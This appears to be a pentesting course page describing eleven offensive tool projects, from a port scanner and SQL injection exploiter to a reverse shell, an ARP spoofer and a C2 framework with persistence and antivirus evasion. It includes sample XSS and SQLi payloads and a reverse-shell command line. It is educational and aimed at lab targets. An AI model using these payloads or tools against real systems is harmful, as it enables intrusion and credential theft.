← Back to all projects

LEARN PENTESTING BY BUILDING

Learn Penetration Testing: The Offensive Toolsmith

Goal: Move from “running scripts” to “writing exploits.” You will understand how vulnerabilities work by writing the tools that find and exploit them. This path covers the entire Kill Chain: Recon, Scanning, Exploitation, Post-Exploitation, and Reporting.

⚠️ LEGAL WARNING: Penetration testing requires explicit written permission from the owner of the system you are testing. Targeting systems without permission is a crime (CFAA in the US, Computer Misuse Act in the UK, etc.). MANDATORY: Build and test these projects ONLY on your own local network or isolated Virtual Machines (like Metasploitable, OWASP Juice Shop, or your own VMs).

Core Concept Analysis

Penetration Testing is a structured process, not chaos.

  1. Reconnaissance: Finding targets (IPs, Domains, Emails).
  2. Scanning: Finding open doors (Ports, Services, Directories).
  3. Exploitation: Kicking the door down (SQLi, Buffer Overflows, Weak Creds).
  4. Post-Exploitation: Looting the house (Privilege Escalation, Persistence).
  5. Reporting: Explaining how you got in.

Project List

Project 1: The “Cartographer” (Subdomain Enumerator)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Go (Golang)
  • Alternative Programming Languages: Python, Bash
  • Coolness Level: Level 2: Practical
  • Business Potential: 2. The “Micro-SaaS” (Bug Bounty tool)
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Passive Reconnaissance / DNS
  • Software or Tool: Sublist3r / Amass clone
  • Main Book: “Black Hat Go” by Steele, Patten, and Kottmann

What you’ll build: A tool that takes a domain (e.g., google.com) and finds subdomains (mail.google.com, dev.google.com) by querying public sources (Certificate Transparency logs, DNS brute forcing) and checking if they resolve.

Why it teaches Pentesting: The attack surface of a company is usually in the forgotten subdomains. This teaches you how DNS works, how to scrape data sources, and how to map a target’s infrastructure before you ever touch it.

Core challenges you’ll face:

  • Concurrent Lookups: DNS is slow if done one by one. You need concurrency (Goroutines) to check thousands of names.
  • Wildcard Handling: Detecting if a domain answers “Yes” to everything to fool you.
  • Data Sources: Parsing JSON from APIs like crt.sh.

Difficulty: Beginner Time estimate: Weekend Prerequisites: Basic HTTP and DNS understanding.

Real world outcome:

$ ./cartographer -d example.com
[+] Found: www.example.com (1.2.3.4)
[+] Found: mail.example.com (1.2.3.5)
[+] Found: dev-internal.example.com (10.0.0.1) <-- Juicy target!

Implementation Hints: Query https://crt.sh/?q=%.target.com&output=json. Parse the JSON to get the names. Then, try to resolve each name to an IP. If it has an IP, it’s live.

Project 2: The “Knock Knock” (Port Scanner)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 2: Practical
  • Business Potential: 1. Resume Gold
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Network Scanning / TCP Handshake
  • Software or Tool: Nmap (Mini version)
  • Main Book: “Black Hat Python” by Justin Seitz

What you’ll build: A multi-threaded port scanner that connects to a target IP, identifies open ports, and grabs the “Banner” (the text the service sends back, like SSH-2.0-OpenSSH...) to identify the software version.

Why it teaches Pentesting: You can’t hack what you can’t see. This forces you to understand the TCP Three-Way Handshake and how services identify themselves. It’s the first step in active hacking.

Core challenges you’ll face:

  • Socket Management: Handling timeouts and refused connections gracefully.
  • Speed: Scanning 65,535 ports takes forever without threads/async.
  • Banner Grabbing: Reading just enough data to identify the service without hanging.

Key Concepts:

  • TCP Connect vs SYN Scan: Full handshake vs Half-open.
  • Sockets: The endpoint of communication.

Difficulty: Intermediate Time estimate: 1 week Prerequisites: Python sockets.

Real world outcome:

$ ./knocker 192.168.1.10
[+] Port 22 Open: SSH-2.0-OpenSSH_7.6p1
[+] Port 80 Open: Apache/2.4.29
[+] Port 3306 Open: MySQL 5.7.33

Project 3: The “Doorbell” (Directory Fuzzer)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Go
  • Alternative Programming Languages: Python
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. Micro-SaaS
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Web Enumeration / HTTP Status Codes
  • Software or Tool: Gobuster / Dirb / Ffuf
  • Main Book: “Black Hat Go”

What you’ll build: A tool that takes a URL and a wordlist (list of common filenames), sends HTTP requests for each word, and reports files that exist based on the HTTP status code (200 OK, 301 Redirect, 403 Forbidden).

Why it teaches Pentesting: Web apps often hide admin panels or backups in “secret” folders like /admin or /backup.zip. This teaches you brute-force logic and HTTP protocol nuances.

Core challenges you’ll face:

  • Status Code Logic: 404 means missing, but what if the server returns 200 for everything (Soft 404)?
  • Recursive Scanning: If you find /images, you should scan inside it.
  • Rate Limiting: Sending too many requests might get you banned (429).

Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP GET requests.

Real world outcome:

$ ./doorbell -u http://target.local -w common.txt
[200] /index.html
[301] /admin  -> Redirects to login
[200] /backup.sql  <-- JACKPOT!

Project 4: The “Needle” (Blind SQL Injection Exploiter)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Ruby
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. Resume Gold
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Web Exploitation / Databases
  • Software or Tool: SQLMap (Mini version)
  • Main Book: “The Web Application Hacker’s Handbook”

What you’ll build: A script that extracts data from a database one character at a time by asking True/False questions. Target: Set up a local “Damn Vulnerable Web App” (DVWA) to test this.

Why it teaches Pentesting: SQL Injection is the “King of Web Vulnerabilities.” Understanding Blind SQLi (where you see no errors, only behavior changes) proves you truly understand the logic, not just how to paste ' OR 1=1 --.

Core challenges you’ll face:

  • Binary Search Algorithm: Guessing a letter (Is it > ‘M’?) is slow. Optimizing to find data fast.
  • Payload Construction: Creating SQL queries that return True/False based on data.
  • Session Handling: Maintaining the login cookie during the attack.

Key Concepts:

  • Truth-Based SQLi: The page loads if True, missing if False.
  • Time-Based SQLi: The page sleeps 5 seconds if True.

Difficulty: Advanced Time estimate: 2 weeks Prerequisites: Strong SQL knowledge.

Real world outcome:

$ ./needle.py -u "http://dvwa.local/vulnerabilities/sqli_blind/?id=1"
[+] Testing injection... Vulnerable!
[+] Database Length: 4
[+] Retrieving Database Name:
    1: d
    2: v
    3: w
    4: a
[+] DB Name: dvwa

Project 5: The “Hook” (Reflected XSS Generator)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: JavaScript (Node.js) or Python
  • Alternative Programming Languages: Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. Micro-SaaS
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Client-Side Attacks / JavaScript
  • Software or Tool: XSStrike
  • Main Book: “The Web Application Hacker’s Handbook”

What you’ll build: A scanner that injects polyglots (strings of weird characters) into URL parameters and checks if they are reflected back in the HTML without encoding. It then generates a Proof-of-Concept payload (like <script>alert(1)</script>).

Why it teaches Pentesting: XSS allows you to steal user cookies or redirect users. This teaches you about HTML contexts (are you inside a <div> or a <script> tag?) and sanitizer evasion.

Core challenges you’ll face:

  • Context Analysis: If your input lands inside <input value="HERE">, <script> won’t work. You need "> <script>.
  • Filter Evasion: Bypassing simple “script” tag removal.

Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTML/JS structure.

Real world outcome:

$ ./hook.py -u "http://test.com/search?q=test"
[+] Vulnerable Parameter: q
[+] Context: HTML Attribute
[+] Payload: " onmouseover=alert(1) "
[+] Link: http://test.com/search?q="+onmouseover=alert(1)+"

Project 6: The “Stack Smasher” (Buffer Overflow Exploit)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python (The Exploit) & C (The Vulnerable App)
  • Alternative Programming Languages: Perl
  • Coolness Level: Level 5: Pure Magic
  • Business Potential: 1. Resume Gold
  • Difficulty: Level 4: Expert
  • Knowledge Area: Binary Exploitation / Memory Management
  • Software or Tool: Exploit Scripts
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build:

  1. The Victim: A C program that uses strcpy vulnerably.
  2. The Exploit: A Python script that sends a specific pattern of bytes to crash the program, overwrite the Instruction Pointer (EIP), and redirect execution to shellcode.

Why it teaches Pentesting: This is the “Holy Grail” of hacking. It teaches you how memory works, registers (EIP, ESP), and how to take control of a CPU.

Core challenges you’ll face:

  • Offset Calculation: Finding the exact number of ‘A’s to crash the program.
  • Bad Characters: Removing bytes (like \x00 null byte) that break the string copy.
  • Shellcode generation: Creating machine code to launch /bin/sh.

Key Concepts:

  • The Stack: How memory is organized.
  • EIP Overwrite: Controlling the flow.
  • NOP Sleds: Handling memory shifting.

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Assembly basics, GDB usage.

Real world outcome: You run the vulnerable server. You run your exploit script. Suddenly, the server stops serving the app and gives you a root command prompt.

Project 7: The “Listener” (Netcat Clone)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C, Go
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. Resume Gold
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Networking / C2
  • Software or Tool: Netcat / Socat
  • Main Book: “Black Hat Python”

What you’ll build: A command-line tool that can listen on a port, connect to a port, and—crucially—execute commands sent over the network (a “Backdoor” or “Reverse Shell”).

Why it teaches Pentesting: “Popping a shell” is the goal. Building one teaches you how Command & Control works, how to handle standard input/output (stdin/stdout) over a network socket, and why firewalls block incoming connections (Bind Shells) but allow outgoing ones (Reverse Shells).

Core challenges you’ll face:

  • IO Piping: Connecting the network socket to cmd.exe or /bin/bash.
  • Stability: Handling when the user types Ctrl+C so the shell doesn’t die.

Difficulty: Intermediate Time estimate: 1 week Prerequisites: Sockets, Subprocess module.

Real world outcome: Machine A (Attacker): ./listener -l -p 4444 Machine B (Victim): ./listener -t 192.168.1.5 -p 4444 -e /bin/bash Result: Machine A now has a prompt controlling Machine B.

Project 8: The “Middleman” (ARP Spoofer)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python (Scapy library)
  • Alternative Programming Languages: C (Libpcap)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. Service & Support (Network Auditing)
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Network Attacks / Layer 2
  • Software or Tool: Bettercap / Ettercap
  • Main Book: “Black Hat Python”

What you’ll build: A tool that tells the Router “I am the Victim” and tells the Victim “I am the Router” (ARP Poisoning). It then forwards packets between them while logging HTTP requests (Credential Sniffing).

Why it teaches Pentesting: This demonstrates the fragility of local networks. You learn about MAC addresses, ARP tables, and how unencrypted traffic (HTTP/Telnet/FTP) can be read by anyone on the wire.

Core challenges you’ll face:

  • The Race Condition: You must constantly send ARP packets to keep the cache poisoned.
  • IP Forwarding: You must enable packet forwarding on your OS, or you will DoS the victim (internet will cut off).
  • Parsing Raw Packets: Extracting “POST /login password=…” from the raw stream.

Difficulty: Advanced Time estimate: 2 weeks Prerequisites: Networking basics (OSI Model Layer 2 vs 3).

Real world outcome: You run the tool. You log into a (HTTP) test site on your phone (connected to WiFi). Your computer terminal shows: [CAPTURED] User: admin | Pass: hunter2.

Project 9: The “Locksmith” (Password Cracker)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python (or C for speed)
  • Alternative Programming Languages: Rust
  • Coolness Level: Level 2: Practical
  • Business Potential: 1. Resume Gold
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Cryptography / Hashing
  • Software or Tool: John the Ripper / Hashcat
  • Main Book: “Violent Python” by TJ O’Connor

What you’ll build: A script that takes a hash (e.g., MD5) and a wordlist (dictionary). It hashes every word in the dictionary and compares it to the target. If they match, it prints the word.

Why it teaches Pentesting: You will often find database dumps with hashed passwords. This teaches you the difference between Encryption (reversible) and Hashing (one-way), and the importance of Salt.

Core challenges you’ll face:

  • Performance: Python is slow. How do you optimize? (Multiprocessing).
  • Hash Types: Identifying if a hash is MD5, SHA1, or Bcrypt.

Difficulty: Beginner Time estimate: Weekend Prerequisites: Basic string manipulation.

Real world outcome:

$ ./locksmith -h 5f4dcc3b5aa765d61d8327deb882cf99 -w rockyou.txt
[+] Cracking...
[+] Found: password

Project 10: The “Privilege Escalator” (System Enumerator)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Bash (Linux) or PowerShell (Windows)
  • Alternative Programming Languages: Python
  • Coolness Level: Level 2: Practical
  • Business Potential: 3. Service & Support
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Post-Exploitation / OS Internals
  • Software or Tool: LinPEAS / WinPEAS
  • Main Book: “The Hacker Playbook 3” by Peter Kim

What you’ll build: A script that runs on a compromised machine and looks for common misconfigurations that allow a user to become Root/Admin (e.g., SUID binaries, writable service paths, unpatched kernel versions).

Why it teaches Pentesting: Getting a shell is usually just user-level access. Becoming Admin is the real win. This teaches you how OS permissions work and where admins usually make mistakes.

Core challenges you’ll face:

  • Knowing what to look for: Researching “Common Linux PrivEsc vectors.”
  • Stealth: Doing this without writing files to disk (running from memory).

Difficulty: Intermediate Time estimate: 1 week Prerequisites: Linux/Windows command line mastery.

Real world outcome: You run ./privesc.sh. It outputs: [CRITICAL] /usr/bin/python has SUID bit set! You can spawn a root shell.

Project Comparison Table

Project Difficulty Time Depth Best For
1. Subdomain Enum Beginner Weekend ⭐⭐ Recon
2. Port Scanner Intermed. 1 Wk ⭐⭐⭐ Networking
3. Web Fuzzer Intermed. 1 Wk ⭐⭐ Web Apps
4. Blind SQLi Advanced 2 Wks ⭐⭐⭐⭐⭐ Web Exploits
5. XSS Gen Intermed. 1 Wk ⭐⭐⭐ Client-Side
6. Buffer Overflow Expert 3 Wks ⭐⭐⭐⭐⭐ Low Level
7. Reverse Shell Intermed. 1 Wk ⭐⭐⭐⭐ C2 Basics
8. ARP Spoofer Advanced 2 Wks ⭐⭐⭐⭐ Network Attacks
9. Hash Cracker Beginner Weekend ⭐⭐ Crypto
10. PrivEsc Enum Intermed. 1 Wk ⭐⭐⭐ System Admin

Recommendation

Start with Project 2 (Port Scanner). It is the fundamental “Hello World” of pentesting tools. It touches on networking, sockets, and basic logic.

Then move to Project 3 (Web Fuzzer) and Project 4 (SQLi). Web apps are the most common entry point for beginners in 2025.

Save Project 6 (Buffer Overflow) for last. It is the hardest but yields the deepest understanding of how computers actually execute code.

Final Overall Project: The “Red Team” Framework (C2)

  • File: LEARN_PENTESTING_BY_BUILDING.md
  • Main Programming Language: Python (Server) + Go (Agent)
  • Difficulty: Level 5: Master

What you’ll build: A Command and Control (C2) framework consisting of:

  1. The Agent: A standalone executable (compiled in Go for portability) that runs on the victim, executes commands, and sends results back. It should handle “Persistence” (survive reboots).
  2. The Server: A Flask/Python app that listens for agents, queues commands, and displays results in a dashboard.
  3. The Communication: Encrypted traffic (AES) over HTTP so it looks like normal web browsing.

Why it teaches Pentesting: This combines everything. You need networking for the connection, crypto for the secrecy, OS internals for the persistence/execution, and evasion techniques to bypass AV. This is what professional Red Teamers use (like Cobalt Strike).

Real World Outcome: You infect a test VM. It checks in to your dashboard. You click “Get Screenshot,” and the image appears on your screen. You type whoami, and you see nt authority\system.

Summary

Project Main Language Focus
1. Subdomain Enum Go Recon
2. Port Scanner Python Scanning
3. Web Fuzzer Go Web
4. Blind SQLi Python Exploit
5. XSS Generator JS/Python Web
6. Buffer Overflow Python/C Binary
7. Netcat Clone Python Network
8. ARP Spoofer Python Network
9. Hash Cracker Python Crypto
10. PrivEsc Script Bash/PS1 Post-Exploit
11. C2 Framework Python/Go Full Stack

Appendix

Practice Targets (Do NOT hack random sites)

To test these tools legally, use these deliberately vulnerable environments:

  1. OWASP Juice Shop: A modern web app full of holes (SQLi, XSS, etc.).
  2. Metasploitable 2/3: A Linux VM with open ports and old services.
  3. Damn Vulnerable Web App (DVWA): Great for testing your SQLi and XSS tools.
  4. Hack The Box / TryHackMe: Use their networks (VPN) to test your tools on their machines.

Essential Resources

  • “The Web Application Hacker’s Handbook” - Dafydd Stuttard
  • “Black Hat Python” - Justin Seitz
  • “Black Hat Go” - Tom Steele
  • “Hacking: The Art of Exploitation” - Jon Erickson
  • OWASP Top 10 - The standard list of web vulnerabilities.
  • PayloadAllTheThings (GitHub) - Reference for injection strings.